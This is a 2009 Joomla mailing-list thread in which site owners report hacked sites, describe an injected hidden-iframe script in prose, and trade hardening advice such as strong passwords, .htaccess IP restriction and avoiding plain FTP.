NYCPHP Meetup

NYPHP.org

[joomla] several 1.0 sites hacked this week!

Mitch Pirtle mitch.pirtle at gmail.com
Thu Mar 26 20:40:33 EDT 2009


This information is unfortunately too late for Barrie, but I have
found vsftpd (Very Secure FTP Daemon) not only secure but wikkid fast
to boot. It supports SFTP, so folks that don't have SSH/SCP can still
use a half-decent client and run over a moderately encrypted
connection.

As for the defense of folks running PHP4, mass shared hosting, and
whatnot... I just made an off-hand comment a few seconds ago regarding
folks using outdated javascript menus that search bots could not
parse:

"If you're not keeping up with the times, don't expect your website to
perform well."

I cannot stress that enough. Seriously. Don't take your horse and cart
on the information superhighway; and if that is all you can afford,
perhaps you need to save up before you take that first ride, and for
certain stay well away from the fast lane. Just like starting a
business - if you cannot pony up the funds required to incorporate a
legitimate entity, don't expected to be treated like a legitimate
entity!

I know it may sound harsh, maybe I'm just grumpy from working too many hours.

-- Mitch, grumpy from working too many hours

2009/3/26 Barrie North <barrie at compassdesigns.net>:
> We found the attacks/IP in the server logs. A financially backed hacker
> outfit from Nigeria, go figure. The joys of having a PR9 site =P
>
> Our password was 10 chars including letters, numbers and punctuation. We are
> hosted on a "secured" rackspace server.
>
> We don't have FTP running any more!
>
> Barrie North
> ~Fully Managed Joomla Sites~
> www.simplweb.com/joomla
> ~Join the Community at compassdesigns.net~
> www.compassdesigns.net/join-the-community.html
>
>
> On Thu, Mar 26, 2009 at 7:29 PM, Atir Javid <atirjavid at gmail.com> wrote:
>>
>> Hello Barrie,
>>
>> May I inquire as to how you verified the attack?  I know that FTP
>> bruteforcing is extremely difficult, and that is very improbable.
>> What you may have faced was a dictionary attack, which may have worked
>> with some luck if you had a weak password.  A password including a mix
>> of
>>
>> 1) UPPERCASE
>> 2) lowercase
>> 3) punctuation/!#$.,
>> 4) numbers
>>
>> and have a good strong/long password you would never fall victim to
>> dictionary.
>>
>> As for bruteforce, an ftpd simply denies access after 3 or 5
>> (configurable, usually defaults to 3) failed login attempts for some
>> time.  Some hosts go as far as restricting ftp access until you call
>> them and verify the problem.  Also, brute forcing over a TCP pipe a
>> slow protocol such as FTP is virtually impossible.  At this rate it
>> would take YEARS to bruteforce the password if not DECADES.
>>
>> @ Other users
>> Also make sure to go into joomla user configuration and change the
>> username of 'admin' to something else.
>> To protect your joomla administation section  If you have a static ip,
>> you can add
>>
>> order allow,deny
>> deny from all
>> allow from your.static.ip.here
>>
>> to a file called .htaccess in your administration folder.  If for some
>> reason your ip changes and you get locked out, simply login via FTP
>> and update the .htaccess file.  There are some other advanced methods
>> for protecting your administration folder.
>>
>> Also, FTP was a protocol developed 30+ years ago.  It is not secure,
>> clear text authentication, etc.  FTP must go.  If you can help it, do
>> not use ftp, instead SFTP, or SSH.  Just.. anything but FTP.  Sadly,
>> thats all that is easy to use, highly available across all hosts, and
>> not everyone on shared hosting provides SSH access.  If you can do
>> without it, do without it. http://wooledge.org/mywiki/FtpMustDie
>>
>> I have seen more sites hacked due to unpatched php or bad php
>> code(mostly from 3rd party addons) more than I have with FTP though.
>>
>> Still with good security practices you can reduce the risk considerably.
>>
>> Peace.
>>
>>
>>
>>
>> 2009/3/26 Barrie North <barrie at compassdesigns.net>:
>> > We got hacked last month by a brute force attack on our FTP password.
>> > Once
>> > they had that, they got into the Joomla files.
>> >
>> > Any site can be hacked. The other half of the equation is vigilance and
>> > backups :)
>> >
>> > Barrie North
>> > ~Fully Managed Joomla Sites~
>> > www.simplweb.com/joomla
>> > ~Join the Community at compassdesigns.net~
>> > www.compassdesigns.net/join-the-community.html
>> >
>> >
>> > On Wed, Mar 25, 2009 at 11:23 PM, Mark Simko <masimko at verizon.net>
>> > wrote:
>> >>
>> >> Several of my clients' 1.0.15 sites have been hacked this week!  Is
>> >> there a problem with 1.0?
>> >>
>> >> I don't see an announcement on joomla.org
>> >>
>> >> I just saw that my site was hacked the other day. Fortunately they
>> >> bunged it up a bit, so the code didn't run, but instead gave an error
>> >> message.
>> >>
>> >> What they had done is append javascript to the index.php file. It was
>> >> disguised as ascii codes, and there were several var defined and
>> >> substituted in, but the result was that it attempted to open a hidden
>> >> iframe directed to siplank.com. When I tried to open siplank.com in a
>> >> web browser (yes, I did that! I do lots of crazy things out of
>> >> curiosity) Firefox stopped it with a warning about the site being known
>> >> for malware.
>> >>
>> >> I'm running 1.5.9 on a shared host. I will be calling my host and
>> >> asking
>> >> them what they can find out from their logs as to what happened.
>> >>
>> >> _______________________________________________
>> >> New York PHP SIG: Joomla! Mailing List
>> >> http://lists.nyphp.org/mailman/listinfo/joomla
>> >>
>> >> NYPHPCon 2006 Presentations Online
>> >> http://www.nyphpcon.com
>> >>
>> >> Show Your Participation in New York PHP
>> >> http://www.nyphp.org/show_participation.php
>> >
>> >
>> > _______________________________________________
>> > New York PHP SIG: Joomla! Mailing List
>> > http://lists.nyphp.org/mailman/listinfo/joomla
>> >
>> > NYPHPCon 2006 Presentations Online
>> > http://www.nyphpcon.com
>> >
>> > Show Your Participation in New York PHP
>> > http://www.nyphp.org/show_participation.php
>> >
>> _______________________________________________
>> New York PHP SIG: Joomla! Mailing List
>> http://lists.nyphp.org/mailman/listinfo/joomla
>>
>> NYPHPCon 2006 Presentations Online
>> http://www.nyphpcon.com
>>
>> Show Your Participation in New York PHP
>> http://www.nyphp.org/show_participation.php
>
> _______________________________________________
> New York PHP SIG: Joomla! Mailing List
> http://lists.nyphp.org/mailman/listinfo/joomla
>
> NYPHPCon 2006 Presentations Online
> http://www.nyphpcon.com
>
> Show Your Participation in New York PHP
> http://www.nyphp.org/show_participation.php
>



More information about the Joomla mailing list